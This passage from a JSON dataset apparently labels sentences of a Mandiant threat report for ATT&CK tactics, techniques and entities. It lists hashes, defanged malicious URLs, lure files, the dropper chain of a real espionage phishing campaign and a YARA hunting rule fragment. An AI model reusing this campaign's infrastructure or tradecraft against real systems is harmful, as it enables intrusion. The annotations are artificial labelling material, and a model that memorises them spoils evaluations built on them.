https://github.com/monoxgas/sRDI/blob/master/ShellcodeRDI\" disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s96-af2682", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 96, "context_before": "meta:\nauthor = \"Mandiant\" description = \"Detects Shellcode RDI projects from https://github.com/monoxgas/sRDI/blob/master/ShellcodeRDI\" disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment.\"", "sentence_text": "[4] e8} condition:\n$ep at 0 }", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s97-263998", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 97, "context_before": "[4] e8} condition:\n$ep at 0 }", "sentence_text": "The following table is a subset of MSV actions for one of the malware variants.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s98-921672", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 98, "context_before": "The following table is a subset of MSV actions for one of the malware variants.", "sentence_text": "Find out more about Indicators of Compromise March 2023:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s99-8be2cb", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 99, "context_before": "Find out more about Indicators of Compromise March 2023:", "sentence_text": "Earthquake-Themed Türkiye Campaign e-yazi.htm (MD5: a3067a0262e651e94329869f43a51722)\nROOTSAW dropper\nRedirected from https://tinyurl[.]com/mrxcjsbs Downloaded from https://www.willyminiatures[.]com/e-yazi.htm/?v=bc78a8d162c6 Drops eeded26943a7b2fdef7608fb21bbfd66 Drops 4a13138e1f38b2817a63417d67038429 e-yazi.pdf (MD5: 4a13138e1f38b2817a63417d67038429)\nDecoy PDF\ne-yazi.iso (MD5: eeded26943a7b2fdef7608fb21bbfd66)\nISO file containing next stages Drops 4b0921979d3054d9f0dad48e9560b9ca (BURNTBATTER)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s100-153be0", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 100, "context_before": "Earthquake-Themed Türkiye Campaign e-yazi.htm (MD5: a3067a0262e651e94329869f43a51722)\nROOTSAW dropper\nRedirected from https://tinyurl[.]com/mrxcjsbs Downloaded from https://www.willyminiatures[.]com/e-yazi.htm/?v=bc78a8d162c6 Drops eeded26943a7b2fdef7608fb21bbfd66 Drops 4a13138e1f38b2817a63417d67038429 e-yazi.pdf (MD5: 4a13138e1f38b2817a63417d67038429)\nDecoy PDF\ne-yazi.iso (MD5: eeded26943a7b2fdef7608fb21bbfd66)\nISO file containing next stages Drops 4b0921979d3054d9f0dad48e9560b9ca (BURNTBATTER)", "sentence_text": "Drops 84b078d4a9e6e2a03e8ae1eca072dc83 (DONUT)\ne-yazi.html (MD5: b051e8efb40c2c435d77f3be77c59488)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s101-f31478", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 101, "context_before": "Drops 84b078d4a9e6e2a03e8ae1eca072dc83 (DONUT)\ne-yazi.html (MD5: b051e8efb40c2c435d77f3be77c59488)", "sentence_text": "ROOTSAW dropper\nDownloaded from https://simplesalsamix[.]com/e-yazi.html Drops 854e5c592e93b69b8ab08dbc8a0b673f Drops f4ef5672af889429d95f111ea65ff490 e-yazi.pdf (MD5: f4ef5672af889429d95f111ea65ff490)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s102-02c10b", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 102, "context_before": "ROOTSAW dropper\nDownloaded from https://simplesalsamix[.]com/e-yazi.html Drops 854e5c592e93b69b8ab08dbc8a0b673f Drops f4ef5672af889429d95f111ea65ff490 e-yazi.pdf (MD5: f4ef5672af889429d95f111ea65ff490)", "sentence_text": "Decoy PDF\nDropped by 854e5c592e93b69b8ab08dbc8a0b673f Dropped by b051e8efb40c2c435d77f3be77c59488 (ROOTSAW)\ne-yazi.zip (MD5: 854e5c592e93b69b8ab08dbc8a0b673f)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s103-55a0f9", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 103, "context_before": "Decoy PDF\nDropped by 854e5c592e93b69b8ab08dbc8a0b673f Dropped by b051e8efb40c2c435d77f3be77c59488 (ROOTSAW)\ne-yazi.zip (MD5: 854e5c592e93b69b8ab08dbc8a0b673f)", "sentence_text": "Zip file containing next stages Dropped by b051e8efb40c2c435d77f3be77c59488 (ROOTSAW)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s104-2958c8", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 104, "context_before": "Zip file containing next stages Dropped by b051e8efb40c2c435d77f3be77c59488 (ROOTSAW)", "sentence_text": "Drops 129da1e7c8613fd8c2843d9ec191e30e (BURNTBATTER)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s105-74d88d", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 105, "context_before": "Drops 129da1e7c8613fd8c2843d9ec191e30e (BURNTBATTER)", "sentence_text": "Drops aec65c1e6a6f9b3782174c192780f5b4 (DONUT)\nMarch 2023: European Diplomatic-Focused Phishing Campaigns Note.pdf (MD5: 1485b591e654327c1d032a901940b149)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s106-29a7a4", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 106, "context_before": "Drops aec65c1e6a6f9b3782174c192780f5b4 (DONUT)\nMarch 2023: European Diplomatic-Focused Phishing Campaigns Note.pdf (MD5: 1485b591e654327c1d032a901940b149)", "sentence_text": "Lure PDF\nContains link to https://parquesanrafael[.]cl/note.html note.html (MD5: 0d5b12c50173a176b0a8ba5a97a831d8)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s107-21eb4b", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 107, "context_before": "Lure PDF\nContains link to https://parquesanrafael[.]cl/note.html note.html (MD5: 0d5b12c50173a176b0a8ba5a97a831d8)", "sentence_text": "ROOTSAW dropper\nDownloaded from https://inovaoftalmologia[.]com[.]br/note.php?ip=&ua= Drops 22adbffd1dbf3e13d036f936049a2e98 note.html (MD5: 9e42b22d66f0fe0fae24af219773ac87)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s108-e26151", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 108, "context_before": "ROOTSAW dropper\nDownloaded from https://inovaoftalmologia[.]com[.]br/note.php?ip=&ua= Drops 22adbffd1dbf3e13d036f936049a2e98 note.html (MD5: 9e42b22d66f0fe0fae24af219773ac87)", "sentence_text": "ROOTSAW dropper\nDownloaded from https://parquesanrafael[.]cl/note.html Drops 22adbffd1dbf3e13d036f936049a2e98 Note.iso (MD5: 22adbffd1dbf3e13d036f936049a2e98)\nMalicious ISO\nDropped by 0d5b12c50173a176b0a8ba5a97a831d8 (ROOTSAW)\nDropped by 9e42b22d66f0fe0fae24af219773ac87 (ROOTSAW)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s109-837f71", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 109, "context_before": "ROOTSAW dropper\nDownloaded from https://parquesanrafael[.]cl/note.html Drops 22adbffd1dbf3e13d036f936049a2e98 Note.iso (MD5: 22adbffd1dbf3e13d036f936049a2e98)\nMalicious ISO\nDropped by 0d5b12c50173a176b0a8ba5a97a831d8 (ROOTSAW)\nDropped by 9e42b22d66f0fe0fae24af219773ac87 (ROOTSAW)", "sentence_text": "Drops db2d9d2704d320ecbd606a8720c22559 (MUSKYBEAT encrypted payload)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s110-47098b", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 110, "context_before": "Drops db2d9d2704d320ecbd606a8720c22559 (MUSKYBEAT encrypted payload)", "sentence_text": "Drops 166f7269c2a69d8d1294a753f9e53214 (MUSKYBEAT)\nApril 2023:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s111-e1f96e", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 111, "context_before": "Drops 166f7269c2a69d8d1294a753f9e53214 (MUSKYBEAT)\nApril 2023:", "sentence_text": "Old Wine in a New Bottle wine event.pdf (MD5: 62b2031f8988105efdf473bdfedd07f5)\nMalicious lure PDF file Downloads from https://sylvio[.]com[.]br/form.php note.zip (MD5: efe86302838ad2ab091540f4e0f7b75a)\nZip file containing next stages NOTE____.EXE (MD5: b1820abc3a1ce2d32af04c18f9d2bfc3)\nLegitimate Windows Word software used for side loading Original name: winword.exe Compiled on: 2022/12/22 19:27:25 note/appvisvsubsystems64.dll (MD5: 9159d3c58c5d970ed25c2db9c9487d7a)\nMUSKYBEAT dropper\nOriginal name: hijacker.dll Compiled on: 2023/04/06 08:49:45 Dropped by efe86302838ad2ab091540f4e0f7b75a Drops bc4b0bd5da76b683cc28849b1eed504d (MUSKYBEAT)\nnote/bdcmetadataresource.xsd (MD5: bc4b0bd5da76b683cc28849b1eed504d)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s112-25314d", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 112, "context_before": "Old Wine in a New Bottle wine event.pdf (MD5: 62b2031f8988105efdf473bdfedd07f5)\nMalicious lure PDF file Downloads from https://sylvio[.]com[.]br/form.php note.zip (MD5: efe86302838ad2ab091540f4e0f7b75a)\nZip file containing next stages NOTE____.EXE (MD5: b1820abc3a1ce2d32af04c18f9d2bfc3)\nLegitimate Windows Word software used for side loading Original name: winword.exe Compiled on: 2022/12/22 19:27:25 note/appvisvsubsystems64.dll (MD5: 9159d3c58c5d970ed25c2db9c9487d7a)\nMUSKYBEAT dropper\nOriginal name: hijacker.dll Compiled on: 2023/04/06 08:49:45 Dropped by efe86302838ad2ab091540f4e0f7b75a Drops bc4b0bd5da76b683cc28849b1eed504d (MUSKYBEAT)\nnote/bdcmetadataresource.xsd (MD5: bc4b0bd5da76b683cc28849b1eed504d)", "sentence_text": "Encrypted next stage Dropped by efe86302838ad2ab091540f4e0f7b75a Dropped by 9159d3c58c5d970ed25c2db9c9487d7a (MUSKYBEAT)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s113-47fffe", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 113, "context_before": "Encrypted next stage Dropped by efe86302838ad2ab091540f4e0f7b75a Dropped by 9159d3c58c5d970ed25c2db9c9487d7a (MUSKYBEAT)", "sentence_text": "Drops 0065cffe5a1c6a33900b781835aa9693 (DAVESHELL)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s114-d70ddb", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 114, "context_before": "Drops 0065cffe5a1c6a33900b781835aa9693 (DAVESHELL)", "sentence_text": "Unknown (MD5: 0065cffe5a1c6a33900b781835aa9693)\nDAVESHELL dropper\nDropped by bc4b0bd5da76b683cc28849b1eed504d (MUSKYBEAT)\nDrops 16d489cc5a91e7dbe74d1c9399534eac (MUSKYBEAT)\nrunner.dll (MD5: 16d489cc5a91e7dbe74d1c9399534eac)\nMUSKYBEAT dropper\nOriginal name: runner.dll Compiled on: 2023/04/06 08:50:03 Dropped by 0065cffe5a1c6a33900b781835aa9693 (DAVESHELL)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s115-e96030", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 115, "context_before": "Unknown (MD5: 0065cffe5a1c6a33900b781835aa9693)\nDAVESHELL dropper\nDropped by bc4b0bd5da76b683cc28849b1eed504d (MUSKYBEAT)\nDrops 16d489cc5a91e7dbe74d1c9399534eac (MUSKYBEAT)\nrunner.dll (MD5: 16d489cc5a91e7dbe74d1c9399534eac)\nMUSKYBEAT dropper\nOriginal name: runner.dll Compiled on: 2023/04/06 08:50:03 Dropped by 0065cffe5a1c6a33900b781835aa9693 (DAVESHELL)", "sentence_text": "Drops c60aa80e0e58c2758f0bac037ec16dca (DONUT)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s116-b09558", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 116, "context_before": "Drops c60aa80e0e58c2758f0bac037ec16dca (DONUT)", "sentence_text": "Unknown (MD5: c60aa80e0e58c2758f0bac037ec16dca)\nDONUT in-memory dropper Dropped by 16d489cc5a91e7dbe74d1c9399534eac (MUSKYBEAT)\nLoads 1f21f9948b412f0198f928ed3266786b (STATICNOISE)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s117-2d98a2", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 117, "context_before": "Unknown (MD5: c60aa80e0e58c2758f0bac037ec16dca)\nDONUT in-memory dropper Dropped by 16d489cc5a91e7dbe74d1c9399534eac (MUSKYBEAT)\nLoads 1f21f9948b412f0198f928ed3266786b (STATICNOISE)", "sentence_text": "Unknown (MD5: 1f21f9948b412f0198f928ed3266786b)\nSTATICNOISE downloader\nCompiled on: 2023/04/04 12:04:49 Dropped by c60aa80e0e58c2758f0bac037ec16dca Communicates with https://sharpledge[.]com/login.php May 2023: Ukraine Foreign Embassy-Focused Campaigns BMW 5 for sale in Kyiv - 2023.docx (MD5: 556857ccb27b527e05415eb6d443aee1)", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "STATICNOISE downloader communicates with a remote web endpoint for command-and-control", "entities": [ { "text": "STATICNOISE downloader", "start": 48, "end": 70, "label": "MalwareTool" }, { "text": "https://sharpledge[.]com/login.php", "start": 166, "end": 200, "label": "Infrastructure_Indicator" }, { "text": "Communicates with", "start": 148, "end": 165, "label": "Action" } ] }, { "uid": "mandiant-24_mandiant_report-p1-s118-e880e2", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 118, "context_before": "Unknown (MD5: 1f21f9948b412f0198f928ed3266786b)\nSTATICNOISE downloader\nCompiled on: 2023/04/04 12:04:49 Dropped by c60aa80e0e58c2758f0bac037ec16dca Communicates with https://sharpledge[.]com/login.php May 2023: Ukraine Foreign Embassy-Focused Campaigns BMW 5 for sale in Kyiv - 2023.docx (MD5: 556857ccb27b527e05415eb6d443aee1)", "sentence_text": "Hyperlink: https://t[.]ly/1IFg\nRedirects to: https://resetlocations[.]com/bmw.htm Unknown Document Hyperlink: https://tinyurl[.]com/ysvxa66c Redirects to https://resetlocations[.]com/bmw.htm bmw.htm (MD5: 880120da2f075155524430ceab7c058e)\nROOTSAW dropper\nDrops e306333093eaf198f4d416d25a40784a\nbmw.iso (MD5: e306333093eaf198f4d416d25a40784a)\nMalicious ISO containing next stage payloads Dropped by 880120da2f075155524430ceab7c058e (ROOTSAW)", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.002", "name": "Spearphishing Link" } ], "procedure": "Uses shortened hyperlinks that redirect to a malicious site to deliver an ISO file, which drops next-stage payloads via the ROOTSAW dropper", "entities": [ { "text": "ROOTSAW", "start": 239, "end": 246, "label": "MalwareTool" }, { "text": "https://resetlocations[.]com/bmw.htm bmw.htm", "start": 154, "end": 198, "label": "Infrastructure_Indicator" }, { "text": "Drops", "start": 255, "end": 260, "label": "Action" } ] }, { "uid": "mandiant-24_mandiant_report-p1-s119-62f2d2", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 119, "context_before": "Hyperlink: https://t[.]ly/1IFg\nRedirects to: https://resetlocations[.]com/bmw.htm Unknown Document Hyperlink: https://tinyurl[.]com/ysvxa66c Redirects to https://resetlocations[.]com/bmw.htm bmw.htm (MD5: 880120da2f075155524430ceab7c058e)\nROOTSAW dropper\nDrops e306333093eaf198f4d416d25a40784a\nbmw.iso (MD5: e306333093eaf198f4d416d25a40784a)\nMalicious ISO containing next stage payloads Dropped by 880120da2f075155524430ceab7c058e (ROOTSAW)", "sentence_text": "Drops 0032b8eabdc41e01923fabca5fe8a06b (DONUT)\nbmw1.png (MD5: 4355851b6fcf2d44e3fd47f47a5e9502)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s120-75c80e", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 120, "context_before": "Drops 0032b8eabdc41e01923fabca5fe8a06b (DONUT)\nbmw1.png (MD5: 4355851b6fcf2d44e3fd47f47a5e9502)", "sentence_text": "Decoy image\nbmw1.png (MD5: 4355851b6fcf2d44e3fd47f47a5e9502)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s121-21e466", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 121, "context_before": "Decoy image\nbmw1.png (MD5: 4355851b6fcf2d44e3fd47f47a5e9502)", "sentence_text": "Decoy image\nbmw2.png (MD5: 5ff4831ee70c07e33c1bbe091840d5ee)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s122-7ccde8", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 122, "context_before": "Decoy image\nbmw2.png (MD5: 5ff4831ee70c07e33c1bbe091840d5ee)", "sentence_text": "Decoy image\nbmw3.png (MD5: 1ec49b2cb9d4ba265678359e117809b8)\nDecoy image\nbmw4.png (MD5: f089fd7204552aec41f64b1eb6b03eda)\nDecoy image\nbmw5.png (MD5: 0b0707ce90548f0c8b952138fff62742)\nDecoy image\nbmw6.png (MD5: 33312f16fd5b88470a0e7560954ae459)\nDecoy image\nbmw7.png (MD5: b382d0f8b130cd1804782d400a4d4f55)\nDecoy image\nbmw8.png (MD5: fc47284181f2bb6785e91c9b92710d78)\nDecoy image\nbmw9.png (MD5: b12a4b8ec485ad9f9c4cae1e25a35db8)\nDecoy image\nbmw1.png.lnk (MD5: 4c00d883444c78f19c3a1af191614491)\nMalicious LNK used to trigger next stage and load image bmw2.png.lnk (MD5: 68cc826c2c58cb74abe3e5ef2123102c)\nMalicious LNK used to trigger next stage and load image bmw3.png.lnk (MD5: 9685dae9ed8d2bf13b66593c1d7cd2eb)\nMalicious LNK used to trigger next stage and load image bmw4.png.lnk (MD5: dd2e5debb0ae8b8bccac5c1fbef6bb5a)\nMalicious LNK used to trigger next stage and load image bmw5.png.lnk (MD5: 5bcf04c0fb0f62fc5f4b83789477a699)\nMalicious LNK used to trigger next stage and load image bmw6.png.lnk (MD5: 3f57258dce31ba0c80002130b8657b2b)\nMalicious LNK used to trigger next stage and load image bmw7.png.lnk (MD5: eccf100bc3d6e901f17a0eced5752ca7)\nMalicious LNK used to trigger next stage and load image bmw8.png.lnk (MD5: dbc9223af733d0140be136cf32a990d9)\nMalicious LNK used to trigger next stage and load image bmw9.png.lnk (MD5: ac78497929569682133e02dec9b67870)\nMalicious LNK used to trigger next stage and load image NOTE____.EXE (MD5: b1820abc3a1ce2d32af04c18f9d2bfc3)\nLegitimate Word application used for DLL side loading Original name: winword.exe Compiled on: 2022/12/22 19:27:25 Dropped by e306333093eaf198f4d416d25a40784a PDB path: D:\\dbs\\el\\na1\\Target\\x64\\ship\\postc2r\\x-none\\winword.pdb AppvIsvSubsystems64.dll (MD5: 53270b3968004cb48dac1a1b239ed23d)\nBURNTBATTER in memory dropper Compiled on: 2023/05/03 13:27:37 Dropped by e306333093eaf198f4d416d25a40784a Loads 0032b8eabdc41e01923fabca5fe8a06b (DONUT)\nojg2.px (MD5: 0032b8eabdc41e01923fabca5fe8a06b)\nEncrypted DONUT payload Loaded by 53270b3968004cb48dac1a1b239ed23d (BURNTBATTER)\nDropped by e306333093eaf198f4d416d25a40784a Drops 6b41c60c24916e3c32acd90bbd7b92f9 (DONUT)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s123-95aead", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 123, "context_before": "Decoy image\nbmw3.png (MD5: 1ec49b2cb9d4ba265678359e117809b8)\nDecoy image\nbmw4.png (MD5: f089fd7204552aec41f64b1eb6b03eda)\nDecoy image\nbmw5.png (MD5: 0b0707ce90548f0c8b952138fff62742)\nDecoy image\nbmw6.png (MD5: 33312f16fd5b88470a0e7560954ae459)\nDecoy image\nbmw7.png (MD5: b382d0f8b130cd1804782d400a4d4f55)\nDecoy image\nbmw8.png (MD5: fc47284181f2bb6785e91c9b92710d78)\nDecoy image\nbmw9.png (MD5: b12a4b8ec485ad9f9c4cae1e25a35db8)\nDecoy image\nbmw1.png.lnk (MD5: 4c00d883444c78f19c3a1af191614491)\nMalicious LNK used to trigger next stage and load image bmw2.png.lnk (MD5: 68cc826c2c58cb74abe3e5ef2123102c)\nMalicious LNK used to trigger next stage and load image bmw3.png.lnk (MD5: 9685dae9ed8d2bf13b66593c1d7cd2eb)\nMalicious LNK used to trigger next stage and load image bmw4.png.lnk (MD5: dd2e5debb0ae8b8bccac5c1fbef6bb5a)\nMalicious LNK used to trigger next stage and load image bmw5.png.lnk (MD5: 5bcf04c0fb0f62fc5f4b83789477a699)\nMalicious LNK used to trigger next stage and load image bmw6.png.lnk (MD5: 3f57258dce31ba0c80002130b8657b2b)\nMalicious LNK used to trigger next stage and load image bmw7.png.lnk (MD5: eccf100bc3d6e901f17a0eced5752ca7)\nMalicious LNK used to trigger next stage and load image bmw8.png.lnk (MD5: dbc9223af733d0140be136cf32a990d9)\nMalicious LNK used to trigger next stage and load image bmw9.png.lnk (MD5: ac78497929569682133e02dec9b67870)\nMalicious LNK used to trigger next stage and load image NOTE____.EXE (MD5: b1820abc3a1ce2d32af04c18f9d2bfc3)\nLegitimate Word application used for DLL side loading Original name: winword.exe Compiled on: 2022/12/22 19:27:25 Dropped by e306333093eaf198f4d416d25a40784a PDB path: D:\\dbs\\el\\na1\\Target\\x64\\ship\\postc2r\\x-none\\winword.pdb AppvIsvSubsystems64.dll (MD5: 53270b3968004cb48dac1a1b239ed23d)\nBURNTBATTER in memory dropper Compiled on: 2023/05/03 13:27:37 Dropped by e306333093eaf198f4d416d25a40784a Loads 0032b8eabdc41e01923fabca5fe8a06b (DONUT)\nojg2.px (MD5: 0032b8eabdc41e01923fabca5fe8a06b)\nEncrypted DONUT payload Loaded by 53270b3968004cb48dac1a1b239ed23d (BURNTBATTER)\nDropped by e306333093eaf198f4d416d25a40784a Drops 6b41c60c24916e3c32acd90bbd7b92f9 (DONUT)", "sentence_text": "Unknown (MD5: 6b41c60c24916e3c32acd90bbd7b92f9)\nDONUT dropper\nDropped by 0032b8eabdc41e01923fabca5fe8a06b (DONUT)\nDrops 036ab9f19b63d44aaccf0f965df9434c (SPICYBEAT)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s124-9e4bdc", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 124, "context_before": "Unknown (MD5: 6b41c60c24916e3c32acd90bbd7b92f9)\nDONUT dropper\nDropped by 0032b8eabdc41e01923fabca5fe8a06b (DONUT)\nDrops 036ab9f19b63d44aaccf0f965df9434c (SPICYBEAT)", "sentence_text": "Unknown (MD5: 036ab9f19b63d44aaccf0f965df9434c)\nSPICYBEAT downloader\nClient_id: 840aae0d-cd89-4869-bce1-94222c33035e\nApplication Name: Teams_test Authentication URL: https://graph.microsoft[.]com/v1.0/me/drive/root:/Apps/Teams_test Invintation.zip (MD5:1aee5bf23edb7732fd0e6b2c61a959ce)\nMalicious ZIP containing next stage Downloaded from https://gavice[.]ng/event_program.php Drops 2d794d1544f933aacbd8da2dad78b381 Drops 5569fb4e9140974a80b4b7587b026913 (BURNTBATTER)", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "SPICYBEAT downloads a malicious ZIP from a remote web server and drops the BURNTBATTER payload as the next stage", "entities": [ { "text": "SPICYBEAT downloader", "start": 48, "end": 68, "label": "MalwareTool" }, { "text": "BURNTBATTER", "start": 456, "end": 467, "label": "MalwareTool" }, { "text": " https://gavice[.]ng/event_program.php", "start": 338, "end": 376, "label": "Infrastructure_Indicator" }, { "text": " Downloaded from https://gavice[.]ng/event_program.php Drops", "start": 322, "end": 382, "label": "Action" } ] }, { "uid": "mandiant-24_mandiant_report-p1-s125-aeff76", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 125, "context_before": "Unknown (MD5: 036ab9f19b63d44aaccf0f965df9434c)\nSPICYBEAT downloader\nClient_id: 840aae0d-cd89-4869-bce1-94222c33035e\nApplication Name: Teams_test Authentication URL: https://graph.microsoft[.]com/v1.0/me/drive/root:/Apps/Teams_test Invintation.zip (MD5:1aee5bf23edb7732fd0e6b2c61a959ce)\nMalicious ZIP containing next stage Downloaded from https://gavice[.]ng/event_program.php Drops 2d794d1544f933aacbd8da2dad78b381 Drops 5569fb4e9140974a80b4b7587b026913 (BURNTBATTER)", "sentence_text": "Drops 1c0059d976795ceded7c1dd706e74bd1\nDrops 595d8ea258ef8d8ec70b0e8a740e903c (DONUT)\ninvitation_letter_and_programme_17.05.2023_en.pdf[spaces].exe/ invitation_letter_and_programme_17.05.2023_ua.pdf[spaces].exe (MD5:2d794d1544f933aacbd8da2dad78b381)\nLegitimate Adobe plugin Compiled on: 2022/04/07 05:19:03 Dropped by 1aee5bf23edb7732fd0e6b2c61a959ce Drops 1ed822cc08ba08413c4a60023e0d590c icucnv22.dll (MD5:5569fb4e9140974a80b4b7587b026913)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s126-fb28cf", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 126, "context_before": "Drops 1c0059d976795ceded7c1dd706e74bd1\nDrops 595d8ea258ef8d8ec70b0e8a740e903c (DONUT)\ninvitation_letter_and_programme_17.05.2023_en.pdf[spaces].exe/ invitation_letter_and_programme_17.05.2023_ua.pdf[spaces].exe (MD5:2d794d1544f933aacbd8da2dad78b381)\nLegitimate Adobe plugin Compiled on: 2022/04/07 05:19:03 Dropped by 1aee5bf23edb7732fd0e6b2c61a959ce Drops 1ed822cc08ba08413c4a60023e0d590c icucnv22.dll (MD5:5569fb4e9140974a80b4b7587b026913)", "sentence_text": "BURNTBATTER dropper\nCompiled on: 2023/05/13 10:04:14 Dropped by 1aee5bf23edb7732fd0e6b2c61a959ce Drops 595d8ea258ef8d8ec70b0e8a740e903c (DONUT)\nly.ed (MD5:595d8ea258ef8d8ec70b0e8a740e903c)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s127-e168f0", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 127, "context_before": "BURNTBATTER dropper\nCompiled on: 2023/05/13 10:04:14 Dropped by 1aee5bf23edb7732fd0e6b2c61a959ce Drops 595d8ea258ef8d8ec70b0e8a740e903c (DONUT)\nly.ed (MD5:595d8ea258ef8d8ec70b0e8a740e903c)", "sentence_text": "Encrypted DONUT\nDropped by 5569fb4e9140974a80b4b7587b026913 (BURNTBATTER)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s128-f757b0", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 128, "context_before": "Encrypted DONUT\nDropped by 5569fb4e9140974a80b4b7587b026913 (BURNTBATTER)", "sentence_text": "Dropped by 1aee5bf23edb7732fd0e6b2c61a959ce Drops 1d54c487e6c8a08517fdb8efedfcd459 (DONUT)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s129-74d777", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 129, "context_before": "Dropped by 1aee5bf23edb7732fd0e6b2c61a959ce Drops 